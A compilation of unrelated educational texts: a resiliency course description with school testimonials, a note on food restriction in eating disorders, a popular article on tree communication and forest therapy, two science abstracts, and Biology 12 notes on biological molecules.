An important topic in the field of positive psychology is resiliency, the idea that one has the ability to bounce back quickly from adversity. How are some people able to quickly recover from an event in their life and become stronger after it? Do they think differently than other people do? Do they behave differently? Is resiliency a trait that some people possess or is it something that can be learned? These questions will be answered as we learn about the research conducted on the protective factors that help us build our resiliency, such as grit, mental agility, self-compassion, and optimism, and read about evidence-based strategies to improve our resiliency. We will also take a strength assessment and learn about the top strengths that resilient people have in common. The book we will read is "Bounce: Mozart, Federer, Picasso, Beckham, and the Science of Success" by Matthew Syed, an Olympic table tennis athlete, who writes about resiliency from the perspective of sports and of people who persist and develop traits that allow them to become superior performers, lessons that can be applied to school, life, and business. The class will have two major assignments, a short paper (on a resilient individual of your choice) and a creative project, and outside of class there will be two discussion questions per week and readings from the book.
Testimonials
“Learning doesn’t stop when you leave the classroom, it’s continuing through every moment of the day and your life, constantly shaping and reshaping you.”

“At Buxton you get to focus on what you want to be learning; whether it is social skills or in-depth studying – you learn to take responsibility of your education.”

“Living your education means to not only learn things, but to use what you learn in your everyday life.”

“To me, living your education means to be independent, to take charge, to not be afraid of asking for help, to learn from your peers, to love to learn, to take what you have learned from a loving environment and take it into the world.”

“Your education is more than just your time in class, it’s your life as a whole. Learning is not limited to a teacher teaching you something in a classroom.”

“To me, at Buxton, it’s not boundaries that you make, but the ones you break through.”

“At Buxton, I can choose what I want to do with my education. I can design my own path and invest my time studying topics that I’m really interested in.”

“At Buxton you can experience your intellectual development in a community that accepts your perspective of the world.”

“I felt instantly at home when I stepped on the campus. At Buxton, we are in school 24/7. We learn things in the classroom, but we really learn valuable things outside of the classroom. We learn how to work with others and respect each other’s spaces. Our education surrounds us and we learn new things everyday.”

“I chose Buxton over public school because I think I function better in a smaller environment. You’re able to get to know students and faculty on a deeper level, which is rare.”

“Students should be happy when they are learning. They should not feel like studying is a burden to them. You learn things from your living space and environment - you are learning every second you are living.”

“Living your education means you become an active learner. You are not just learning in the classroom or while you are doing your homework. You live your life learning and taking in the world’s various educations.”

“Buxton has shown me that it is possible to forge close bonds with teachers as well as students. It also gives you the ability to try new things in an environment where there is no judgment.”

“I chose Buxton for a small community-based education with focus on the individual as part of the world at large, along with the learning settings.”

“I love the atmosphere and how tightly knit the community is. At Buxton you take what you learn in the classroom and use it in everyday life - you learn from the world around you and see how you can make it better.”

“At Buxton you bring your education into everything you do, and learn important, relevant things that you can utilize all the time.”

“At Buxton, wherever I go, whatever I do, I’m learning. Formal classes are just an extension of the learning that happens everywhere else in my life.”

“Being academic feels important. It really helps forge relationships between students and faculty, which is such an important thing here. It is so important that the faculty live in the dorms and everyone has a faculty advisor. You get to know your teachers outside of school life and having those relationships really strengthens the joy I have in learning.”

“To me, ‘live your education’ means to aim for learning in everything you do - not just in the classes and schoolwork. Every experience in life has educational value, so the more experiences I have the more educated I can be.”

“There are no boundaries between our times for learning and our times for living; this is because of the fact that we have classes at all different times of day, and because all our activities are intermingled with our classes. We live at the place we go to school, so people learn everyday all day even outside of the classroom.”

“A sense that everybody matters, that you are in a community where everyone can make a difference and reach their full potential, where you are interdependent and you work together, and most importantly where you understand that you can do whatever you want to do and whatever it is that you do, you have got to make a difference. I think that, more than anything, defines my experience at Buxton.”
One common symptom of an eating disorder is the perceived need to eliminate or restrict certain foods. Extreme restriction of certain foods may indicate the presence of a disorder such as Anorexia Nervosa or Orthorexia. Restricted food groups often include processed foods, fast foods, or foods that are higher in sugar and fats (snack items, sweets, and desserts).
Alternatively, someone struggling with Compulsive Overeating or Binge Eating Disorder might alternate between periods of severe overconsumption and total restriction. It is important that intensive work is done in treatment to normalize both one’s attitudes toward and intake of such foods when working to reintroduce that person to the variety, novelty, and pleasure of eating.
The term “all foods fit” is often used to emphasize that there are no “good” foods or “bad” foods. The idea that no food has a moral value is an important concept in removing judgments and distortions that often form in disordered eating beliefs and practices.
Unfortunately, it is also common for foods like fruits, vegetables, and whole grains to become associated with eating disorder patterns. For example, a client once said “Focusing on eating vegetables was something I did when I was restricting or I started focusing on clean eating. If I was having salads, it meant I was dieting, denying, or punishing myself.” In a situation where food is restricted, working on accepting and practicing the idea that all food has a place in a healthy diet is essential. By re-incorporating all of the vital components of a balanced diet, individuals can develop an eating pattern free of eating disorder behaviors.
How Trees Talk And Why We Should Listen

Trees are intelligent organisms that use an underground network to communicate. Learning to understand their language could help protect trees, benefit our ecology and improve our health.
Do you ever think about that tree you planted in grade school? Probably not, but take yourself back in time for a minute …
It’s Arbor Day. Every student and teacher is standing outside your school, holding small potted plants in hand. Amidst the chaos and excitement, you can vaguely remember a lesson going along with the day’s activities. If you were anything like me, you tuned most of it out, because hey, it was springtime and you were outside. These kinds of school days are what you live for at 8 years old.
So, you planted your tree, got the warm fuzzies for doing your part and never thought about it again.
Fast forward 20 years. Since that day in 2nd grade, over 300 billion trees have been harvested. The one tree you planted, while helpful, is just a splinter in the effort to combat climate change and the destruction of our delicate ecosystem.
Why Planting One Tree Is Important
Since the dawn of agriculture, our planet's tree population has been cut almost in half. An estimated 15 billion trees are harvested globally each year, with only 5 billion planted each year to resupply them. And that isn't counting the 4-5 million acres burned by forest fires annually in the U.S. alone, consuming thousands of trees.
The effects of deforestation unfold slowly, but not as slowly as you might think. At the rate we're currently going, Earth could be completely devoid of trees in just a few hundred years.
Trees play an important part in the planet’s carbon cycle, and without them, the earth’s ecosystem would be destroyed. Though the one tree you planted in grade school may seem insignificant, it wasn’t in vain. Here’s why:
- Trees transform light from the sun, water from the ground and carbon dioxide from the air into food. During this process, trees also create oxygen, which gets released back into the atmosphere. Scientists believe that just one tree can provide a day's supply of oxygen for four people.
- Trees remove harmful and even deadly pollutants from the air by breathing them in through their leaves. A single, healthy tree is believed to be able to store almost 50 pounds of carbon each year. The average American's carbon footprint was estimated at 20 tons per year; it would take 800 trees (almost two acres of trees spaced 10 feet apart) just to store one American's yearly carbon use.
- Trees also trap airborne particles like dust, pollen, ash and smoke. One comparison equated breathing the air in Seattle to smoking 7 cigarettes. Trees are an extremely valuable weapon against diseases caused by poor air quality.
- Trees give us clean water: 97% of the world's fresh water is stored in natural underground reservoirs called aquifers, which provide us with clean drinking water and irrigation water for our crops. After a tree has its fill of rain water, the excess runs past its roots and into the earth's aquifers.
- Trees can filter soil pollutants, too. Water runoff from a farm contains up to 88% less nitrate and 76% less phosphorus after flowing through a forest. A single sugar maple tree can remove 140 mg of chromium, 820 mg of nickel, and 5,200 mg of lead from the soil per year.
- Trees can create rain and prevent floods. One mature oak tree can transpire more than 100 gallons of water per day. Transpiration is when water is absorbed through tree roots and released through the leaves into the air as vapor. Studies have shown that significantly more rain is produced from clouds that travel over forests than from clouds that do not.
- Trees are part of an important ecosystem that provides habitat and food for birds and other animals. In fact, trees are home to almost half the world's species. Researchers have found that planting just one tree in an open pasture can increase bird biodiversity in the area from zero to 80.
- Trees help regulate temperature, and not just by providing physical shade from the sun. The evaporation from a single tree can produce the cooling effect of 10 room-size air conditioners.
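The 800-tree figure follows directly from the numbers quoted above; here is a quick sanity check, assuming "tons" means US short tons (2,000 lb):

```python
# Sanity-check the carbon arithmetic quoted in the article.
# Assumption: "tons" means US short tons of 2,000 lb each.
CARBON_STORED_PER_TREE_LB = 50   # lb of carbon one healthy tree stores per year
FOOTPRINT_TONS = 20              # average American's yearly carbon footprint
LB_PER_TON = 2000

footprint_lb = FOOTPRINT_TONS * LB_PER_TON
trees_needed = footprint_lb / CARBON_STORED_PER_TREE_LB
print(trees_needed)  # 800.0 trees to store one person's yearly carbon

# "Almost two acres of trees spaced 10 feet apart": one acre is 43,560 sq ft,
# and each tree on a 10 ft grid occupies roughly a 10 ft x 10 ft cell.
trees_per_acre = 43560 // 100
print(trees_needed / trees_per_acre)  # roughly 1.8 acres
```

The grid spacing is an approximation, but it shows the article's "almost two acres" claim is consistent with its own numbers.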
Trees are a vital factor in keeping our planet and its inhabitants alive and healthy. Despite humanity's constant abuse of her throughout history, Mother Nature has learned to shift and heal in order to adapt to constant change. The good news is the U.S. has been steadily adding to its forests since the 1940s, and China, in an effort to battle overwhelming pollution, has a plan to plant 32,400 square miles of trees in 2018 alone. In fact, over 120 countries have pledged to plant more trees and restore forests in response to the devastation consumerism has wreaked on planet Earth.
The Surprising Healing Benefit Of Trees
We’re at a time in history when global health is declining almost as quickly as healthcare costs are surging. The world’s population is desperate for safe and accessible ways to heal mentally, emotionally, and physically.
Trees may just be the answer we are looking for: studies have shown that spending quality time with our tree friends can lower blood pressure, decrease stress hormones, fight depression, accelerate healing, and improve immune system function. Because of this new research, many countries are putting more effort into planting trees and getting people outside.
In South Korea, plans to open almost 40 healing forests are already in the works. These retreats are open to everyone and offer activities like forest prenatal classes, barefoot garden walks, and even programs for bullies to decrease their aggression. Their mission is simple: "to realize a green welfare state, where the entire nation enjoys well-being."

In Japan, millions of dollars and thousands of hours have been spent studying nature's effects on the overall health of human beings. Researchers have extensively studied a practice called "shinrin-yoku," which is essentially spending time outside, breathing in nature. As it turns out, the smell of nature is actually a huge part of its healing benefit. Trees produce what scientists call phytoncide, which is what gives trees their "woodsy" smell. This smell, the essential oil of nature, has proven to provide impressive healing benefits. Forest therapy is considered so important in parts of Japan that it is often covered by healthcare benefits.

In the United States, some pediatricians are prescribing nature to children as a form of preventative medicine. Ecotherapy has been implemented by doctors across the nation to help ease symptoms of anxiety and accelerate healing.
In many countries, licensed Forest Therapy Guides will walk you through nature, like a real-time guided meditation. Why do they choose nature over neighborhoods? It's simple: a 2011 study compared walking through the city with walking through the forest. Although both activities required the same amount of physical effort, the forest walks decreased stress hormones and lowered blood pressure significantly more than the city walks. Nature walkers also showed decreased activity in the subgenual prefrontal cortex, a part of the brain linked to depression and negative rumination. Whether you pay for a retreat or frolic in the trees solo, forest therapy is happening all around the world with the same positive results, suggesting that nature may truly be the best medicine.
Talking Tree Roots
We know that humans, animals, and all living creatures cannot live without trees. But can trees live without one another?
Scientists are now discovering that trees are much more like humans than we ever thought. No longer are trees seen with a “survival of the fittest” mentality, competing for food, water, and sunlight.
Trees are actually much like families. They are social creatures and rely heavily on one another for survival. Mature “mother trees” suckle their young. Old, weaker trees (and even ancient stumps) are kept alive by their surrounding posterity. Friends strategically point their branches during growth so as not to overcrowd each other. They can even warn one another when there is danger. “A forest has an amazing ability to communicate and behave like a single organism — an ecosystem,” says Suzanne Simard, an ecologist at the University of British Columbia and a pioneer in the language of trees.
And, as it turns out, a lot of this communication is happening just beneath the soil. Peter Wohlleben, author of "The Hidden Life of Trees," says that trees use an underground network to send and receive messages. This network, coined "The Wood Wide Web," is made up of fungi that grow at root tips and connect one tree to another. With this network, trees are able to detect their surroundings and assist trees in need. If a seedling is weak or sick, the mother tree will send nutrients through her roots over to the struggling sapling. Trees that get attacked by bugs will send signals through the fungi so that neighboring trees can increase their own resistance to the threat. Wohlleben says that these family-like behaviors are so obvious to him, he can walk through a forest and tell which trees are working together. He says in his book: "[A] pair of true friends is careful right from the outset not to grow overly thick branches in each other's direction. The trees don't want to take anything away from each other … such partners are often so tightly connected at the roots that sometimes they even die together."
Trees can even store memories. They are among the oldest living organisms on earth, and Simard believes that these memory stores could have a lot to do with that. "They've lived for a long time and they've lived through many fluctuations in climate," Simard says. "They curate that memory in the DNA. The DNA is encoded and has adapted through mutations to this environment, so that genetic code carries the code for variable climates coming up." The older trees share this DNA memory through the underground network in order to keep themselves, and their posterity, alive.

The Importance Of Mindful Planting And Harvesting To Ecology
Trees aren't selfish creatures. The Wood Wide Web connects over 80% of the planet's land plants to one another, allowing communication and the transfer of nutrients such as water, carbon and nitrogen between species. Deforestation devastates this ecosystem.
While the U.S. forestry and forest products sector is one of the most significant employers in U.S. manufacturing, some big steps are being taken to make the industry more environmentally friendly. Paper mills aim to use every bit of the tree, even burning wood chips and bark to make renewable energy. The logging industry is being directed toward selectively thinning trees rather than wiping out complete forests. And more recently, the White House has made plans for selective logging in order to keep catastrophic wildfires to a minimum.
Both Wohlleben and Simard believe that trees go far beyond the basic characteristics of life; they are living, breathing organisms with behaviors much like ours. While Simard knows that trees will likely be harvested and used for as long as human beings are on this planet, she urges us to practice compassion and consciousness when dealing with our ancient friends. "We've got to reimagine ourselves as part of this network," Simard says. "Imagine yourself listening to all the other creatures … tap into that below ground network and become part of the conversation." Simard points out that mindful harvesting is the key to keeping our forests, and the ecological habitat they create, healthy and thriving for years to come. "When we do cut, we need to save the legacies, the mother trees," she proposes, "so they can pass their wisdom on to the next generation of trees, so they can withstand the future stresses coming down the road." She advocates for planting and allowing natural forest regeneration: "let Mother Nature have the tools she needs in order to heal herself," she says.
Despite the global net loss of 10 billion trees per year, the growth of U.S. forests currently exceeds the amount harvested by more than 33%. This is a great start, but we all have a part to play in conservation. Here are some ways you can help protect our trees and the ecosystem they create:
- Get involved: Organize a tree planting project in your community or volunteer at one.
- Be mindful: When you're out for your daily (or weekly) dose of nature therapy, do not travel off trails and try not to disrupt the forest's delicate ecosystem. That means no stomping around like Godzilla and certainly no carving your name into tree trunks (I'm looking at you, Carl + Kate forever).
- Don't litter: Pack out what you pack in. This includes seemingly harmless things, such as orange peels and sunflower seed shells. They can take months to decompose and can attract wildlife and other critters toward trails.
- Camp smart: Always make sure your campfires are completely put out.
- Educate yourself: Develop a relationship with the trees in your own backyard. Learn how to care for and fertilize them. Tend to sick trees and practice proper maintenance techniques.
- Go paperless: About 39% of the fibers used for making paper come from recycled materials, but we can still do more. Request that bills be sent electronically, print less when possible and opt for online magazine subscriptions.
- Reuse and recycle: Many items made from tree matter can be reused, recycled, or repurposed. Reuse gift bags, repurpose old furniture or use old newspapers as gift wrap. The options are endless!
- Take it to your garden: Wood chips and sawdust from tree trimmings make excellent fertilizer when left to decompose in your garden. Contact your local arborist or landscaping company; many times they will let home gardeners haul chips away for free. Chips hold 70% of their volume in water, making them ideal for fruit-bearing trees. In the right climate, a tree can go without being watered for multiple years when it is fertilized with wood chips. They also give back to the ecosystem by providing food and nutrients for worms and microorganisms needed for optimum gardening.
- Get outside: Take some time to appreciate the part trees play in the delicate balance of nature.
The more time we spend with Mother Nature, the more we will understand what we can do to help her, and in turn, help ourselves.
You may not often think of that tree you planted all those years ago, but Mother Earth does. She thanks you for it by using it as a tool to provide clean water, soil, oxygen and habitat for hundreds of living things. Because of your tree and the billions of trees being planted annually, we are quite literally sowing a better future for ourselves and generations to come. As the Chinese Proverb says, “The best time to plant a tree was twenty years ago. The second best time is now.”
So go ahead, hug a tree today! And better yet: plant one.
Abstract
The physiological mechanisms of an integrated rehabilitation program and its constituent rehabilitation techniques, namely, local rhythmic thermal impulses; rapid autogenic regulation (RAR); and a session of slow, deep breathing, were studied in apparently healthy subjects who had experienced emotional stress. Mental arithmetic under the conditions of a time deficit with a reprimand was used as a model of emotional stress, which caused a number of rearrangements in the cerebral activity of the subjects, including enhanced β activity in the right frontal area and depression of slow EEG waves in the posterior cerebral areas, and promoted sympathetic influences and hemodynamic impairment. The set of rehabilitation measures, which was designed to affect the body as a whole, promoted the restoration of the initial cortical bioelectrical activity and autonomic status of the subjects. The mechanisms of each rehabilitation technique included in the program were determined.
Biology 12 – Lesson 3 – Biological Molecules
Chemistry Comes Alive – The Organic Molecules of Life
Text Ref: Pg 32-45 and 52-61

The organic molecules of life are divided into four classes:

POLYMERS
MONOMERS

1. Carbohydrates – building blocks are:
2. Lipids – building blocks are:
3. Nucleic Acids – building blocks are:
4. Proteins – building blocks are:

Hydrolysis – adding water to break down organic molecules (POLYMERS) into their building blocks (MONOMERS), e.g. carbohydrates into glucose molecules.
Dehydration Synthesis – removing a water molecule to join building blocks (MONOMERS) into organic molecules (POLYMERS), e.g. glucose molecules into carbohydrates.
http://nhscience.lonestar.edu/biol/dehydrat/dehydrat.html

Carbohydrates

Carbohydrates are a group of molecules that includes sugars and starches. All carbohydrates contain carbon (C), hydrogen (H) and oxygen (O), and all carbohydrate molecules are made up of one or more monomers called monosaccharides.

Carbohydrates have a variety of important functions in living organisms:
1) Energy storage and fuel. Foods rich in carbohydrates include breads, pasta, rice, corn, oats, fruit and veggies.
2) Structural components of nucleotides, animal connective tissue, plant and bacterial cell walls, and arthropod exoskeletons.
3) Cell-to-cell communication and cell identification. Carbohydrates are located on the outer surface of the cell membrane for this purpose.

Monosaccharides – "Simple Sugars"

Single-chain or single-ring structures containing 3-7 carbon atoms.
E.g. Glucose (C6H12O6), a hexose sugar, is blood sugar.
E.g. Ribose (C5H10O5), a pentose sugar, is found in ribonucleic acid (RNA).

Empirical formula for a monosaccharide: CnH2nOn
E.g. Glucose, aka blood sugar, is a 6-carbon sugar (n=6). The chemical formula of glucose is C6H12O6.
E.g. Ribose is a 5-carbon sugar (n=5) found in RNA molecules. The chemical formula of ribose is C5H10O5.

Disaccharides – "Double Sugars"

A disaccharide is formed when 2 monosaccharides are joined by dehydration synthesis.
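The empirical formula CnH2nOn can be sketched as a tiny helper function; this is an illustration only, checking the glucose and ribose examples in the notes:

```python
def monosaccharide_formula(n: int) -> str:
    """Build the chemical formula C_n H_2n O_n for an n-carbon simple sugar."""
    return f"C{n}H{2 * n}O{n}"

print(monosaccharide_formula(6))  # glucose: C6H12O6
print(monosaccharide_formula(5))  # ribose:  C5H10O5
```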
During dehydration synthesis, a bond between 2 monosaccharides is created when one monosaccharide loses a hydroxyl group (-OH) and the other loses a hydrogen (-H), forming water (hence "dehydration"). Disaccharides must be digested into monosaccharides before they can be absorbed from the digestive tract into the blood. A hydrolysis reaction is used to break a disaccharide apart into 2 monosaccharides.

Polysaccharides – "Many Sugars"

Polysaccharides are long carbohydrate chains made up of individual monosaccharides that have been linked together by dehydration synthesis. They are fairly insoluble, making them great storage molecules.

Starch
Storage form of glucose inside plant cells. When we eat starchy foods such as potatoes or grains, the starch must be digested so its glucose monomers can be absorbed and used to make energy. Composed of many glucose monomers in straight chains, with only a few branched chains.

Glycogen
Storage form of glucose in animals and humans. Stored in muscle and liver cells. A highly branched, large molecule. When blood sugar levels drop, liver cells break down glycogen and release its glucose monomers into the blood.

Questions to Ponder: How does the highly branched structure of glycogen make it both an effective storage molecule and allow us almost instant access to glucose fuel? What is the key difference between starch and glycogen?

Cellulose
Found in plant cell walls, where it gives them rigidity. We are unable to digest it, BUT it acts as an important source of fiber that helps move feces through the colon. A linear molecule whose alternating (beta) glycosidic bonds humans cannot break.

Lipids

Lipids are insoluble (do not dissolve) in polar solvents like water. Like carbohydrates, all lipids contain carbon (C), oxygen (O) and hydrogen (H).
The most familiar lipids are found in fats (animal sources) and oils (plant sources).

Main Functions:
1. Long-term energy storage – lipids give the most energy per unit gram of food.
2. Insulation against heat loss.
3. A protective cushion around major organs, e.g. the kidneys.
4. Storage of the fat-soluble vitamins E, K, A and D.

3 Main Types:
1. Neutral Fats (Triglycerides)
2. Phospholipids
3. Steroids

Neutral Fats (Triglycerides)
The neutral fats are commonly known as fats when solid or oils when liquid. Deposits of neutral fats are found mainly beneath the skin, where they insulate the deeper body tissues from heat loss and protect them from mechanical trauma. As neutral fats are digested into their monomers, they release large amounts of energy our body can use. They are produced when 1 glycerol and 3 fatty acid chains are joined by dehydration synthesis. Because of the 3:1 fatty acid to glycerol ratio, the neutral fats are also called triglycerides.

Saturated Fatty Acids
Fatty acid chains with single covalent bonds between carbon atoms. Solid at room temperature. Usually from animal sources, i.e. butter, lard.

Unsaturated Fatty Acids
Fatty acid chains with one (monounsaturated) or more (polyunsaturated) double bonds between carbons. Liquid or soft at room temperature, i.e. oils. Usually from plant sources. Hydrogenation (adding hydrogens = trans fat) can convert them to margarine and Crisco.

CBC Radio Interview on Fatty Acids: http://www.cbc.ca/metromorning/episodes/2012/09/12/confusing-omega-3/

Phospholipids
Phospholipids are the chief component of cell membranes. Phospholipids are modified triglycerides: they contain a phosphate group and 2 fatty acid chains. The "head" region is hydrophilic (attracts water and other charged ions). The "tail" region is hydrophobic ("phobic" = repels water). These properties result in a 2-layered membrane often called a "phospholipid bilayer".
The membrane which surrounds ALL of our cells is a phospholipid bilayer and maintains a barrier between extracellular ("extra" = outside) and intracellular ("intra" = inside) fluids.

Steroids
Structurally, steroids are very different from fats: their basic structure is 4 interlocking hydrocarbon rings. The single most important molecule in our steroid chemistry is cholesterol. We ingest cholesterol in animal products such as eggs, meat and cheese, and our liver produces a certain amount as well.

Main Functions of Cholesterol:
1. Cholesterol is a key component of plasma membranes in animal cells – it plays a role in membrane fluidity (more on that when we learn about cells).
2. Cholesterol is the precursor to the sex hormones estrogen and testosterone.
3. Cholesterol is the raw material for the synthesis of vitamin D and bile salts.

Did You Know? Cholesterol has earned a bad reputation because of its role in arteriosclerosis – the clogging and hardening of the arteries. Although excessive amounts of cholesterol in the diet can lead to this dangerous condition, cholesterol is absolutely essential for human life. For example, without sex hormones such as estrogen and testosterone, reproduction would be impossible, and a total lack of the corticosteroids produced by the adrenal gland is fatal.

Proteins

Functions of Proteins
Enzymes – biological catalysts that speed up chemical reactions in our bodies, e.g. synthesis and hydrolysis, DNA replication, digestion, and blood clotting.
Structural proteins – found throughout the body, e.g. keratin builds hair and nails, collagen gives strength to skin, cartilage, ligaments and tendons, and muscle fibers (skeletal, smooth, and cardiac) are composed of the proteins actin and myosin.
Membrane proteins – the plasma membrane of cells has numerous embedded proteins that act as channels or pores, carriers, and pumps to move molecules into and out of the cell.
Chemical messengers – peptide hormones control functions such as metabolic rate, growth, stress response, blood glucose levels, immune function, and circadian rhythms.
Plasma proteins – plasma is the liquid portion of blood, making up 55% of its volume; plasma is mainly water and contains 7-8% proteins. Albumin helps maintain blood volume and pressure, globulins help fight infection, and fibrinogen forms blood clots.

Structure of Proteins

Amino Acids
Proteins are linear polymers made from monomers called amino acids. There are 20 common amino acids. The 12 amino acids our body can produce are called non-essential amino acids; the 8 amino acids we must obtain from our food are called essential amino acids.

Chemical Structure of an Amino Acid
All amino acids have the same structural components. A central carbon atom is linked to 4 different chemical groups:
1) Hydrogen atom
2) Amine group (-NH2)
3) Carboxylic acid group (-COOH)
4) R-group (remainder group)

Differences in the "R" group make each amino acid chemically unique. We can think of the 20 amino acids as a 20-letter "alphabet" used in specific combinations to form proteins. In our bodies there are thousands of proteins, and every one has a specific and exact combination of amino acids.

Peptide Bonds
Proteins are polymers: long linear chains (no branches) of amino acids joined together by dehydration synthesis. The bond which is formed between 2 amino acids is called a peptide bond.
Dipeptide – 2 amino acids linked by a peptide bond.
Polypeptide – several or many amino acids linked by peptide bonds.
Most proteins contain 100 – 10,000 amino acids.

For example, oxytocin is a protein hormone that stimulates a woman's uterus to contract during labour. It is a small polypeptide chain made up of 9 amino acids linked together by peptide bonds.
Oxytocin: Cys – Tyr – Ile – Gln – Asn – Cys – Pro – Leu – Gly - NH2

Levels of Protein Organization
Proteins have 4 different structures, or levels of organization.

Primary Structure (1°)
The linear sequence of amino acids that forms a polypeptide chain. It resembles a strand of beads on a chain. Proteins are not functional in this form.

Secondary Structure (2°)
Hydrogen bonds form between the NH and CO groups of amino acids in the primary polypeptide chain. These hydrogen bonds cause the chain to form an alpha helix or a beta pleated sheet. A single polypeptide chain may have BOTH types of secondary structure at various places along its length.

Tertiary Structure (3°)
Tertiary structure is achieved when an alpha helix or pleated sheet folds up to produce a compact, ball-like (globular) molecule. This structure is maintained by both hydrogen and covalent bonds between amino acids.
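As a back-of-the-envelope check on the oxytocin example: a chain of n amino acids joined by dehydration synthesis contains n−1 peptide bonds and releases n−1 water molecules as it forms. A small sketch (the sequence string format is an illustration only):

```python
def peptide_stats(sequence: str):
    """Count residues, peptide bonds, and waters released for a
    hyphen-separated amino acid sequence (three-letter codes)."""
    residues = [aa for aa in sequence.replace(" ", "").split("-")
                if aa and aa != "NH2"]  # terminal NH2 is an amide group, not a residue
    n = len(residues)
    # Each peptide bond forms by dehydration synthesis, releasing one water.
    return n, n - 1, n - 1

# Oxytocin, as written in the notes above:
aa_count, bonds, waters = peptide_stats("Cys-Tyr-Ile-Gln-Asn-Cys-Pro-Leu-Gly-NH2")
print(aa_count, bonds, waters)  # 9 amino acids, 8 peptide bonds, 8 waters released
```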
Quaternary Structure (4°) When 2 or more polypeptide chains join together to form a single complex protein The oxygen-binding protein haemoglobin has this structure Most enzymes have this structure The activity of a protein depends on its specific 3-dimensional structure Denaturing Proteins The ability of a protein to function correctly directly depends on its 3-dimensional shape When the pH drops below a critical level or our body temperature rises above normal, this can cause hydrogen bonds to break - proteins will unfold and lose their 3-D shape When a tertiary or quaternary protein loses its 3-D shape it becomes non-functional and is said to be denatured e.g When you add acid to milk (lower the pH) the milk curdles because casein proteins found in milk have lost their quaternary structure If you cook an egg you are adding excessive heat to the albumin proteins found in egg whites High body temperatures (fever) have the potential to cause many different enzymes within the body to denature 12 Biology 12 – Lesson 3 - Biological Molecules Nucleic Acids The nucleic acids are the largest biological molecules in the body. They are often referred to as the “molecules of life” because they carry all of life’s instructions encrypted in chemical code. This code governs how the body grows, develops, functions, and maintains homeostasis – a state of internal balance. There are 2 major classes of nucleic acids in our bodies: 1) Deoxyribonucleic Acid (DNA) 2) Ribonucleic Acid (RNA) Both DNA and RNA molecules are polymers constructed from monomers called nucleotides Every nucleotide is made from 3 subunits: 1. Phosphate (phosphoric acid) 2. Pentose sugar (5-carbon sugar) Deoxyribose in DNA Ribose in RNA 3. 
Nitrogen-containing base (a base because its presence raises the pH of a solution)
- Nitrogenous bases in DNA: cytosine (C), guanine (G), adenine (A), thymine (T)
- Nitrogenous bases in RNA: cytosine (C), guanine (G), adenine (A), uracil (U)

Examine the chemical structure of a nucleotide below:

Deoxyribonucleic Acid (DNA)
- Chemically, DNA looks a lot like a "twisted ladder": two long polymers made up of adjoining nucleotides that twist to form a double helix.
- The 2 sides of the ladder are referred to as the "sugar-phosphate backbones".
- The "rungs" of the ladder are formed when 2 complementary nitrogenous bases are joined by weak hydrogen bonds.
- Adenine (A) always hydrogen bonds to ____________ (complementary bases)
- Cytosine (C) always hydrogen bonds to ____________ (complementary bases)
- The sugar of one nucleotide and the phosphate of another are held together by strong phosphodiester bonds.

A Closer Look at DNA
DNA's 4 nitrogenous bases (C, G, A, T) can be separated into 2 categories:
1) Purines: have a 2-ring structure, e.g. guanine (G) and adenine (A)
2) Pyrimidines: have a single-ring structure, e.g. cytosine (C) and thymine (T)

One purine always hydrogen bonds to a pyrimidine.
- The complementary base pair A – T forms _____ hydrogen bonds
- The complementary base pair C – G forms _____ hydrogen bonds

Did You Know?
- Our entire DNA sequence would fill 200 1,000-page New York telephone directories.
- If unwound and tied together, the strands of DNA in one cell would stretch almost six feet long but would be only 50 trillionths of an inch wide.
- If you uncoiled the DNA in all of your cells, you could reach the moon 6,000 times!
- There are 3 billion letters in the human genome; it would take a person typing 60 words per minute, 8 hours a day, around 50 years to type it out.
- In 2003, the human genome was completely sequenced, down to the last nucleotide.
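The complementary base-pairing rule described above (A pairs with T, C pairs with G) can be sketched as a small lookup. This snippet is an added illustration, not part of the worksheet.

```python
# Sketch: building the complementary strand of a DNA sequence using the
# base-pairing rules (adenine with thymine, cytosine with guanine).
PAIRS = {"A": "T", "T": "A", "C": "G", "G": "C"}

def complement(strand):
    """Return the complementary bases for one side of the 'twisted ladder'."""
    return "".join(PAIRS[base] for base in strand)

print(complement("ATTCG"))  # -> TAAGC
```

Note that complementing twice returns the original strand, which is exactly why either side of the ladder is enough to reconstruct the whole molecule.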
- DNA has a multi-coiled structure that allows an incredible amount of it to be packed into the tiny space within a cell's nucleus.
- When cells are not dividing, DNA is called chromatin: a loosely coiled, tangled mass of DNA inside the nucleus.
- When human cells are preparing to divide, their DNA is tightly coiled into 46 X-shaped chromosomes arranged in 23 pairs.
- Each chromosome contains sections of DNA called genes.
- Each gene contains a set of instructions to make a specific protein.

Ribonucleic Acid (RNA)
- DNA is simply a storage molecule for genetic information: although DNA contains the instructions for how to build proteins, it is NOT capable of building proteins itself.
- RNA is a "molecular slave": it uses the instructions provided by the genes in DNA to build proteins.
- RNA is made within a cell's nucleus; however, it functions mainly outside of the nucleus.
- RNA is a single-stranded polymer of many nucleotides.
- The pentose sugar in the sugar-phosphate backbone (S-P-S-P-S…etc.) of RNA is ribose.
- The 4 nitrogenous bases found in an RNA molecule are: cytosine (C), guanine (G), adenine (A), uracil (U).

There are 3 major types of RNA; all play a unique role in protein synthesis.
1) Messenger RNA (mRNA)
2) Ribosomal RNA (rRNA)
3) Transfer RNA (tRNA)

Comparing DNA and RNA

ATP – Adenosine Triphosphate
- As we have learned, glucose is the most important fuel for our bodies and our cells; however, NONE of the chemical energy stored in its bonds is used directly to power cellular work.
- As glucose is broken down in the mitochondria, the energy released is captured and stored as small packets of energy in the bonds of ATP.
- ATP, in turn, acts as a chemical "drive shaft" that provides a usable form of energy immediately available to cells.
- Structurally, ATP is similar to an RNA nucleotide in that it contains adenine, ribose, and a phosphate group; however, it has a total of 3 phosphate groups instead of one.
- The unstable bonds that hold the phosphate groups together contain large amounts of stored energy.
- When cells require energy, ATP undergoes hydrolysis, and a bond between phosphate groups is broken to release energy.
- E.g. ATP is used by virtually all cells in the body to synthesize macromolecules such as carbohydrates and proteins. Muscle cells use the energy from the breakdown of ATP to contract. Nerve cells use it to conduct nerve impulses. Cells use ATP to actively pump various molecules against their concentration gradients, either into or out of the cell.
Supercritical fluids have attracted increasing interest as reactive media (with properties tunable from liquid-like to gas-like) for synthesizing nanostructured materials by thermal decomposition of inorganic precursors at relatively low pressure and temperature. The particle formation process (nucleation and growth) is driven by high supersaturation in the supercritical fluid, so adjusting the synthesis process parameters gives precise control of particle shape, size (between 10 nm and 10 μm), and chemical composition. We present a thermal treatment technique to produce nanostructured nickel oxynitride in supercritical ammonia (acting as both solvent and reactant) from the thermal decomposition of nickel hexafluoroacetylacetonate (280°C, 18 MPa). A preliminary study of the magnetic properties of the material was carried out, and a correlation between particle size and magnetic behavior was identified.
